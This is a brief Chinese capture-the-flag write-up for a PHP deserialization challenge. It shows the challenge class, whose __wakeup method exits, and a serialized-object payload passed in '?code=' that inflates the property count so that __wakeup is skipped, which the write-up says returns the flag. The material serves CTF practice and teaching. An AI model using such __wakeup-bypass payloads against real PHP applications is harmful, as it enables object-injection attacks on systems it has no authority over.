也是一道反序列化的题目。

    1. class xctf{
    2. public $flag = '111';
    3. public function __wakeup(){
    4. exit('bad requests');
    5. }
    6. ?code=

    虽然并没有给出什么弹flag的代码,但是最后提示?code=
    那么按照套路,先把__wakeup绕过去
    payload

    1. ?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

    直接就得到flag了。